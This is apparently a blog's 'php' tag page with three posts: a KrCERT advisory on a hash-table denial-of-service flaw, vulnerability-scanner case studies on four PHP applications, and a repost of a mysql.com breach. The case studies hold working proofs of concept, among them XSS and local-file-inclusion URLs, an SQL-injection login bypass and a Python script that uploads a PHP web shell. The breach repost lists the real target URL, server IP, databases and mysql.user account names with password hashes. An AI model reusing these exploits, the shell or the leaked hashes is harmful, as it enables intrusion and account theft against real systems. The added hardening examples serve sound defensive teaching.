65 posts tagged 'php'

  1. 2012.01.03 Security Update for Hash Table Implementation Vulnerability (2)
  2. 2011.11.21 PHP Vulnerability Hunter
  3. 2011.09.27 MySql.Com Hacked with Blind SQL Injection by Jackh4xor
2012.01.03 09:40

Security Update for Hash Table Implementation Vulnerability

□ Overview
   o A flaw in hash table implementations lets an attacker cause outages in the many
      applications and services that rely on this functionality
   o An attacker who sends a specially crafted request to an affected system can put it
      into a denial-of-service state

□ Affected Systems
   o Affected systems
     - .NET Framework versions prior to the MS11-100 security patch
     - PHP 5.3.8, 5.4.0RC3 and earlier
     - Apache Tomcat 5.534, 6.0.34, 7.0.22 and earlier

□ Remediation
   o Users of vulnerable .NET Framework versions
     - Apply the latest Windows security patches so that the MS11-100 update is installed [1]
   o Users of vulnerable PHP versions
     - Update to PHP 5.3.9, 5.4.0RC4 or later [2]
   o Users of vulnerable Apache Tomcat versions
     - Update to Apache Tomcat 5.5.35, 6.0.35, 7.0.23 or later [3]

□ Terminology
   o Hash table
     - A storage structure made up of buckets, each able to hold one or more records, in
       which a record's position is computed by a hashing function.

□ Other Inquiries
   o When will security updates be released for applications not covered by this advisory?
     - Important security updates related to this vulnerability will be announced promptly
       on the KrCERT/CC website as they are published
   o KISA Internet Incident Response Center (KrCERT/CC): dial 118, no area code needed

[References]
[1] http://technet.microsoft.com/ko-kr/security/bulletin/MS11-100
[2] http://www.php.net/
[3] http://tomcat.apache.org/
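As an added illustration of the shape the fixes took (example code written for this page, not part of the KrCERT/CC advisory): PHP 5.3.9 introduced the php.ini directive max_input_vars, defaulting to 1000, which caps the number of variables the engine will insert into $_GET, $_POST and $_COOKIE; Tomcat 6.0.35 and 7.0.23 added a maxParameterCount attribute on the Connector (default 10000), and MS11-100 caps ASP.NET form values at 1000. Application code that parses untrusted query strings itself with parse_str() is not covered by the PHP directive, so it needs the same bound applied by hand; the function and exception names below are this example's own.

```php
<?php
// Added example, not from the advisory: bound the number of key/value pairs
// before they are inserted into a PHP array (which is a hash table).  PHP 5.3.9
// does this for the request superglobals via php.ini:
//
//     max_input_vars = 1000   ; default since 5.3.9; lower it if no form on the
//                             ; site ever legitimately sends that many fields
//
// parse_str() on application-supplied strings bypasses that directive, so the
// wrapper below (its names are this example's own) applies the same cap.
declare(strict_types=1);

final class TooManyParameters extends RuntimeException
{
}

/**
 * Parse a query string into an array like parse_str(), refusing it when it
 * carries more than $maxPairs pairs.  Counting separators is a linear scan of
 * the raw string and happens before any array insertion, so a flood of
 * deliberately colliding keys is rejected without ever being hashed.
 */
function parse_query_bounded(string $query, int $maxPairs = 1000): array
{
    if ($query === '') {
        return [];
    }
    $pairs = substr_count($query, '&') + 1;
    if ($pairs > $maxPairs) {
        throw new TooManyParameters(
            sprintf('query string carries %d pairs, limit is %d', $pairs, $maxPairs)
        );
    }
    $out = [];
    parse_str($query, $out);
    return $out;
}

// Constructed inputs: an ordinary query string and a synthetic flood of 5000
// distinct keys (the cap does not care whether the keys collide).
$normal = 'id=1170&lang=en';
var_dump(parse_query_bounded($normal));

$flood = implode('&', array_map(static fn (int $i): string => "k$i=1", range(1, 5000)));
try {
    parse_query_bounded($flood, 1000);
} catch (TooManyParameters $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The cap is a size limit, not a fix for the hash function itself, which is why the vendors shipped it as the immediate mitigation: it keeps the worst case bounded regardless of how the keys are chosen, and a request that trips it is worth logging, since ordinary forms never come close to the limit.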


  1. armada 2012.01.05 11:49

    For PHP and Tomcat, the reference sites don't have any related content either. Where can I get the patches?

2011.11.21 20:48

PHP Vulnerability Hunter

All testing was performed on Windows XP and Vista using XAMPP. Each target application was installed, then a full scan was performed. Noteworthy log entries revealing exploitable faults are shown, followed by the exploit proofs of concept and the resulting advisories.

Case Study 1: MODx Revolution 2.0.2-pl

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /modx/manager/index.php?service=12%3cscript%3ealert(0)%3c%2fscript%3e&login_context=12%3cscript%3ealert(0)%3c%2fscript%3e&q=12%3cscript%3ealert(0)%3c%2fscript%3e&cultureKey=12%3cscript%3ealert(0)%3c%2fscript%3e&modahsh=12%3cscript%3ealert(0)%3c%2fscript%3e&installGoingOn=12%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 13:54:18 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=653ch30lgkjk9bo8b7gu13u8u4; expires=Thu, 27-Jan-2011 13:54:18 GMT; path=/modx/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 20 Jan 2011 13:54:18 GMT
Cache-Control: post-check=0, pre-check=0
Content-Length: 6946
Content-Type: text/html; charset=UTF-8

[Response Trimmed]
<form id="modx-login-form" action="" method="post">
<input type="hidden" name="login_context" value="mgr" />
<input type="hidden" name="modahsh" value="12<script>alert(0)</script>" />
[Response Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Original Advisory

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /modx/manager/controllers/default/resource/tvs.php?class_key=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 04:21:29 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 11
Content-Type: text/html

LFI_Test123

Local File Inclusion Proof of Concept

http://localhost/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
Original Advisory 


Case Study 2: CMS Made Simple 1.8

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /cmsms/admin/addbookmark.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 192
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="default_cms_lang"

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt 
------x--


HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 05:00:36 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: CMSSESSID839fe7b5=uk0uvk8aja6cfajgluik3sbok3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sp_=883fc4fd
Content-Length: 322
Content-Type: text/html

LFI_Test123<script type="text/javascript">
<!--
    location.replace("http://localhost/cmsms/admin/login.php");
// -->
</script>
<noscript>
    <meta http-equiv="Refresh" content="0;URL=http://localhost/cmsms/admin/login.php">
</noscript>

Local File Inclusion Proof of Concept

import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
urllib.urlencode({ 'default_cms_lang': lfi }),
{ 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()
Original Advisory 
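Case studies 1 and 2 show the same ingredients: a parameter (MODx's class_key, CMS Made Simple's default_cms_lang) that ends up in a filesystem path, "../" sequences that walk out of the intended directory, and a trailing %00 that truncates the path so an appended suffix such as ".php" is never seen. Below is an added example written for this page (not code from either project) that contrasts an illustrative vulnerable loader with one that allowlists the name and then confirms the resolved path stays inside the language directory; the directory layout and function names are assumptions of the example.

```php
<?php
// Added example, not CMS Made Simple or MODx code.
declare(strict_types=1);

// Vulnerable (illustrative): the parameter is spliced into the path.  "../"
// walks out of $langDir, and on PHP builds that still accepted NUL bytes in
// paths (before 5.3.4) the %00 ended the C string, dropping the ".php" suffix.
function language_file_unsafe(string $langDir, string $lang): string
{
    return $langDir . '/' . $lang . '.php';
}

// Hardened: accept only an identifier-shaped language code, then confirm the
// canonical path is still inside the canonical $langDir.  Either check alone
// would stop the inputs below; keeping both means a later loosening of the
// regex does not silently reopen traversal.
function language_file_safe(string $langDir, string $lang): ?string
{
    if (!preg_match('/\A[a-z]{2}(?:_[A-Z]{2})?\z/', $lang)) {
        return null;
    }
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . $lang . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // Compare against base + separator so "/lang" does not match "/lang2/x".
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed fixture: a language directory holding one real translation file.
$langDir = sys_get_temp_dir() . '/lfi_demo_lang';
if (!is_dir($langDir)) {
    mkdir($langDir, 0700, true);
}
file_put_contents($langDir . '/en.php', "<?php\nreturn ['hello' => 'Hello'];\n");

// Constructed inputs modelled on the log entries: a legitimate code, traversal
// alone, and traversal followed by a NUL byte.
$inputs = [
    'en',
    str_repeat('../', 32) . 'windows/win.ini',
    str_repeat('../', 32) . "windows/win.ini\0",
];
foreach ($inputs as $lang) {
    $safe = language_file_safe($langDir, $lang);
    printf(
        "%-40s\n  unsafe -> %s\n  safe   -> %s\n",
        addcslashes(substr($lang, 0, 40), "\0"),
        addcslashes(language_file_unsafe($langDir, $lang), "\0"),
        $safe === null ? 'REJECTED' : $safe
    );
}
```

Note the two halves age differently: PHP 5.3.4 and later reject NUL bytes in filesystem paths, so the %00 truncation stops working on patched interpreters, but the "../" traversal is an application bug and survives every PHP upgrade until the application validates the value.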


Case Study 3: Injader 2.4.4

SQL Injection Log Entry

Alert Name: Potential SQL Injection
POST /injader/login.php?un='%3b--%22%3b--&pw='%3b--%22%3b-- HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 02:30:15 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 794
Content-Type: text/html

<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>C:\tools\xampp\htdocs\injader\sys\includes\ifw\IQuery.php</b> on line <b>143</b><br />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" 
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>Database Error</title>
<link rel="stylesheet" type="text/css" href="/injader/sys/loginpage.css" />
</head>
<body>
<div id="mPage">
<h1>Database Error</h1>
<p>Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1. </p>

<p>Your query was: SELECT username, id FROM maj_users WHERE username = '\'</p>
<p id="err-src"><strong>Source:</strong> User::ValidateLogin; Line: 179</p>
</div>
</body>
</html>

SQL Injection Proof of Concept

http://localhost/injader/login.php?un=\\'%20or%20id=1%20and%20'a'='a&pw=\\'%20or%20'a'='a
Original Advisory 
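The error page above echoes the query the login builds, SELECT username, id FROM maj_users WHERE username = '...', with the parameter spliced into the SQL text. As an added example (not Injader's code; PDO over an in-memory SQLite database stands in for MySQL, and the table contents are constructed), here is that query built by concatenation beside the same query as a prepared statement, both run against a tautology payload of the kind used in the proof of concept.

```php
<?php
// Added example, not Injader code.  PDO over an in-memory SQLite database
// stands in for the MySQL backend; the schema and rows are constructed.
declare(strict_types=1);

function demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE maj_users (id INTEGER PRIMARY KEY, username TEXT NOT NULL)');
    $db->exec("INSERT INTO maj_users (id, username) VALUES (1, 'admin'), (2, 'alice')");
    return $db;
}

// Vulnerable (illustrative): the value becomes part of the SQL text, as the
// echoed query on the error page shows.  A closing quote in the value ends
// the literal and everything after it is parsed as SQL.
function find_user_unsafe(PDO $db, string $username): ?array
{
    $sql = "SELECT username, id FROM maj_users WHERE username = '" . $username . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened: the SQL text is fixed and the value travels as a bound parameter,
// so the database never parses it.  Escaping helpers such as addslashes() are
// not a substitute; binding removes the problem instead of papering over it.
function find_user_safe(PDO $db, string $username): ?array
{
    $stmt = $db->prepare('SELECT username, id FROM maj_users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = demo_db();
// Constructed input modelled on the proof of concept: close the literal, then
// append a condition that holds for the row with id=1.
$payload = "' or id=1 and 'a'='a";

// Concatenation: the WHERE clause reads  username = '' or id=1 and 'a'='a'
// and the id=1 row is returned although no such username exists.
var_dump(find_user_unsafe($db, $payload));

// Binding: the database looks for a user whose name is literally the payload.
var_dump(find_user_safe($db, $payload));
```

The error page is a second, separate defect: it prints the failed query and the source location to the client, which is exactly the feedback an attacker needs to refine a payload. Log that detail server-side and return a generic message.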


Case Study 4: NetworX 1.0.3

Arbitrary Upload Log Entry

Alert Name: Arbitrary File Event - Type=Changed Path=C:\tools\xampp\htdocs\networx\tmp\shell.php
POST /networx/about.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 195
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="shell_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:34:40 GMT
[Trimmed]

Shell Upload Proof of Concept

import sys, socket
host = 'localhost'
path = '/networx'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
           'Host: ' + host + '\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 193\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n\r\n'
           '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
           '------x--\r\n\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'

    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    shell_path = path + '/tmp/shell.php'

    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
    else: print 'shell located at http://' + host + shell_path

upload_shell()
Original Advisory
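The arbitrary-upload entry above shows the two properties that turned a file upload into code execution: the file kept its client-supplied name (shell.php) and landed under the document root (networx/tmp/), where the server executes PHP. The following added example (not NetworX code; the allowlist, directory names and function names are assumptions of the example) validates an upload by extension and by sniffed content, gives it a server-chosen name, and stores it outside the web root. Because move_uploaded_file() only accepts files that arrived through a real HTTP upload, the demo exercises the validation step on constructed temp files.

```php
<?php
// Added example, not NetworX code.
declare(strict_types=1);

// Allowlist: the extension a file may carry and the MIME type its bytes must
// sniff as.  Both are assumptions of the example; a real list is per site.
const ALLOWED_UPLOADS = [
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'pdf' => 'application/pdf',
];

/**
 * Validate one $_FILES entry.  Returns the allowed extension, or null with the
 * reason in $reason.  Nothing here trusts the client: the name only supplies
 * the extension to check, the declared Content-Type is ignored, and the bytes
 * are sniffed with finfo.
 */
function validate_upload(array $file, ?string &$reason = null): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        $reason = 'transfer error ' . ($file['error'] ?? 'none');
        return null;
    }
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!isset(ALLOWED_UPLOADS[$ext])) {
        $reason = "extension '$ext' not allowed";
        return null;
    }
    $sniffed = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($sniffed !== ALLOWED_UPLOADS[$ext]) {
        $reason = "content sniffed as '$sniffed', expected " . ALLOWED_UPLOADS[$ext];
        return null;
    }
    return $ext;
}

/**
 * Store a validated upload under a random server-chosen name in $storeDir,
 * which must sit outside the document root (or have PHP execution disabled
 * for it).  Returns the stored path or null.
 */
function store_upload(array $file, string $storeDir): ?string
{
    $ext = validate_upload($file);
    if ($ext === null) {
        return null;
    }
    $dest = rtrim($storeDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

// Constructed fixtures standing in for $_FILES entries (no real upload here).
function fixture(string $clientName, string $bytes): array
{
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    return ['name' => $clientName, 'type' => 'image/png', 'tmp_name' => $tmp,
            'error' => UPLOAD_ERR_OK, 'size' => strlen($bytes)];
}

// A 1x1 PNG (constructed fixture) and a harmless PHP file with a lying name.
$png1x1 = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
$cases = [
    'shell.php' => fixture('shell.php', "<?php echo 'never run'; ?>\n"),  // extension and content both wrong
    'shell.png' => fixture('shell.png', "<?php echo 'never run'; ?>\n"),  // extension lies, the sniff catches it
    'photo.png' => fixture('photo.png', $png1x1),                        // accepted
];
foreach ($cases as $label => $file) {
    $reason = null;
    $ext = validate_upload($file, $reason);
    printf("%-10s %s\n", $label, $ext === null ? "rejected: $reason" : "accepted as .$ext");
    unlink($file['tmp_name']);
}
```

The server-chosen name also removes the second half of the problem in the log entry: the attacker could predict where shell.php would land and request it directly. A random name in a directory the web server does not execute from leaves nothing to request even if a check is later bypassed.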

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /networx/group_connections_list_popup.php?logout=181%3cscript%3ealert(0)%3c%2fscript%3e&group_id=181%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:38:22 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=jl5bal27shg6e9akhu5566lqu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2107
Content-Type: text/html

[Trimmed]
<input type="hidden" name="GroupID" value="181<script>alert(0)</script>" />
<input type="image" src="images/btn-send_invitations.gif" alt="Send Invitations" />
[Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Original Advisory
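Both reflected XSS entries on this page (MODx's modahsh in case study 1 and NetworX's group_id in case study 4) show the same pattern: a request parameter echoed into a hidden input's value attribute without escaping, which is why a value beginning with "> closes the attribute and the tag. The following is an added example written for this page, not code from either project; it contrasts an illustrative vulnerable renderer with one that escapes for the attribute context, and the function names are this example's own.

```php
<?php
// Added example, not MODx or NetworX code: the pattern behind both reflected
// XSS log entries is a request parameter written into value="..." unescaped.
declare(strict_types=1);

// Vulnerable (illustrative): the raw parameter lands inside the attribute.
function render_hidden_unsafe(string $name, string $value): string
{
    return sprintf('<input type="hidden" name="%s" value="%s" />', $name, $value);
}

// Escape for an HTML attribute.  ENT_QUOTES covers both quote characters so
// neither "..." nor '...' delimited attributes can be broken out of;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning '' (which would
// silently drop the value); the charset must match the page's.
function esc_attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened: every dynamic value goes through esc_attr(), the attribute is
// always quoted, and escaping happens at the point of output.
function render_hidden_safe(string $name, string $value): string
{
    return sprintf(
        '<input type="hidden" name="%s" value="%s" />',
        esc_attr($name),
        esc_attr($value)
    );
}

// Self-check: the only tag boundaries in the output are the input element's own.
function check_no_breakout(string $html): bool
{
    return substr_count($html, '<') === 1
        && substr_count($html, '>') === 1
        && strpos($html, '<script') === false;
}

// Constructed input: the attribute-breakout string from the proofs of concept.
$payload = '"><script>alert(0)</script>';
foreach (['modahsh', 'group_id'] as $param) {
    echo render_hidden_unsafe($param, $payload), PHP_EOL;
    $safe = render_hidden_safe($param, $payload);
    echo $safe, PHP_EOL;
    assert(check_no_breakout($safe));
}
```

Escaping belongs at the sink, chosen for the context the value is written into (attribute here; a JavaScript string or a URL would need a different encoder). Stripping "<script" from input, a common first reaction, does not address the attribute breakout at all, as the proofs of concept above show: the damage is done by the quote and the angle bracket, not by any particular tag name.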


Source: autosectools.com
2011.09.27 16:55

MySql.Com Hacked with Blind SQL Injection by Jackh4xor

The Mysql website offers database software, services and support for your business, including the Enterprise server, the Network monitoring and advisory services and production support. The wide range of products includes Mysql clusters, an embedded database, drivers for JDBC, ODBC and .Net, visual database tools (query browser, migration toolkit) and, last but not least, MaxDB, the open source database certified for SAP/R3. Mysql services are also available: choose among Mysql training for database solutions, Mysql certification for developers and DBAs, and Mysql consulting and support. Whether you are new to database technology or a skilled developer or DBA, Mysql offers services of all sorts to its customers.


Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170
Host IP           : 213.136.52.29
Web Server        : Apache/2.2.15 (Fedora)
Powered-by        : PHP/5.2.13
Injection Type    : MySQL Blind
Current DB        : Web

Data Bases:

information_schema
bk
certification
crashme
cust_sync_interim
customer
dbasavings
downloads
feedback
glassfish_interface
intranet
kaj
license_customers
manual
manual_search
mem
mysql
mysqlforge
mysqlweb
news_events
partner_training
partners
partners_bak
phorum5
planetmysql
qa_contribution
quickpoll
robin
rp
sampo
sampo_interface
sessions
softrax
softrax_interim
solutions
tco
test
track
track_refer
wb
web
web_control
web_projects
web_training
webwiki
wordpress
zack

Current DB: web

Tables:

xing_validation
v_web_submissions
userbk
user_extra
user  Columns: cwpid version lead_quality sfid industry address2 created last_modified lang notify newsletter gid title fax cell phone country zipcode state city address business company position lastname firstname passwd verified bounces email user_id
us_zip_state
us_area_state
unsub_log
trials
trial_external_log
trial_data
trial_alias
training_redirect
tag_blacklist
tag_applied
tag
support_feeds_DROP
support_entries_DROP
states
snapshots_builds
snapshots
sakilapoints
regions
quote_customer
quote
quicklinks
promo
product_releases
position
partner
paper_lead
paper_details_options
paper_details_old
paper_details
paper
newsletter_unsub
nav_sites
nav_items
mysql_history
mirror_status
mirror_country
mirror_continent
mirror
mailing_list_member
mailing_list
locks
lead_validity_rules
lead_source_xref
lead_source_external
lead_source
lead_routing_rule
lead_rep
lead_old
lead_note
lead_extra_old
lead_extra_new
lead_extra
lead_companies
lead_campaign_member
lead
language_strings
language_modules
imagecache
hall_of_fame
g_search_term
g_search_data
g_blog_data
forum_comment
forms
field_xref
field_options
field_match
email_blacklist
email_a_friend
drpl_manual_review
drpl_denied
drpl_check_log
drpl_cache
customer_meta_sets
customer_meta_set
customer_meta
customer
coupon_product
coupon_campaign_attribute
coupon_campaign
coupon
country
countries
campaign_type
campaign_topic
campaign_score
campaign_listdata
campaign_detail
business
bounces

Database : mysql

Table:

user_info
user     Column: Update_pri Insert_priv Select_priv Password User Host
time_zone_transition_type
time_zone_transition
time_zone_name
time_zone_leap_second
time_zone
tables_priv
slow_log
servers
procs_priv
proc
plugin
ndb_binlog_index
inventory
host
help_topic
help_relation
help_keyword
help_category
general_log
func
event
db
columns_priv

# mysql.user Data

Password                                   User             Host
(empty)                                    wembaster        %
(empty)                                    monitor          10.%
(empty)                                    sys              %
(empty)                                    sys              localhost
*06581D0A5474DFF4D5DA3CE0CD7702FA52601412  forumread        %
*0702AEBF8E92A002E95D40247776E1A67CD2CA3F  wb               %
*2A57F767D29295B3CB8D01C760D9939649483F85  flipper          10.%
*32F623705BFFFE682E7BD18D5357B38EF8A5BAA9  wordpress        %
*66A905D4110DF14B41D585FDBCE0666AD13DD8C1  nagios           %
*704EB56151317F27573BB4DDA98EDF00FFABAAF8  root             localhost
*ED1BDC19B08FD41017EE180169E5CEB2C77F941A  mysqlforge       %
*FD75B177FFEC3590FE5D7E8459B3DDC60AE8147B  webleads         10.%
00680dd718880337                           olof             %
077f61a849269b62                           qa_r             %
077f61a849269b62                           qa_rw            %
077f61a849269b62                           qa_adm           %
0c2f46ba6b87d4ea                           trials_admin     10.%
1856b9b03b5a6f47                           cacti            %
19519e95545509b5                           certification    %
1a39dcad63bbc7a6                           gf_mschiff       %
2277fd7d562ec459                           webslave         localhost
2277fd7d562ec459                           webslave         %
304404b114b5516c                           planetmysql_rw   %
35e376451a87adb0                           planetmysql_ro   %
4e203d581b756a93                           webmaster        localhost
4e203d581b756a93                           webmaster        %
4e93479179a8ec93                           sysadm           %
575ec47e16c7e20e                           phorum5          %
575ec47e16c7e20e                           lenz             %
5f340ec40a706f64                           robin            %
61113da02d2c97a5                           regdata          %
616075f256f111ba                           myadmin          10.100.6.44
61711eea3de509ac                           merlin           127.0.0.1
6302de0909a369a1                           ebraswell        %
6b72b2824cc7f6fe                           mysqlweb         %
6ffd2b17498cdd44                           zack             %
70599cf351c6f591                           repl             %
740284817e3ed5a8                           webwiki          %
74c5529b41a97cc2                           web_projects

Database: web_control

Table:

system
system_command
service_request
run_control
request_daemon
rebuild_server
rebuild_queue
rebuild_control
quarterly_lead_report
newsletter_log
newsletter_control
ips
hosts  Columns: notes description name
dns_servers Columns: name internal ip

Database: certification

Tables:

signup
corpcustomers
certexamdata
certcandidatedata
certaccess

Database: wordpress

Tables:

wp_4_term_taxonom
wp_4_term_relationships
wp_4_posts
wp_4_postmeta
wp_4_options
wp_4_links
wp_4_comments
wp_3_terms
wp_3_term_taxonomy
wp_3_term_relationships
wp_3_posts
wp_3_postmeta
wp_3_options
wp_3_links
wp_3_comments
wp_2_terms
wp_2_term_taxonomy
wp_2_term_relationships
wp_2_posts
wp_2_postmeta
wp_2_options
wp_2_links
wp_2_comments
wp_1_terms
wp_1_term_taxonomy
wp_1_term_relationships
wp_1_posts
wp_1_postmeta
wp_1_options
wp_1_links
wp_1_comments
wp_11_terms
wp_11_term_taxonomy
wp_11_term_relationships
wp_11_posts
wp_11_postmeta
wp_11_options
wp_11_links
wp_11_comments
wp_10_terms
wp_10_term_taxonomy
wp_10_term_relationships
wp_10_posts
wp_10_postmeta
wp_10_options
wp_10_links
wp_10_comments
remove_queries

Database: bk

Table:

wp_backupterm_taxonomy
wp_backupterm_relationships
wp_backupposts
wp_backuppostmeta
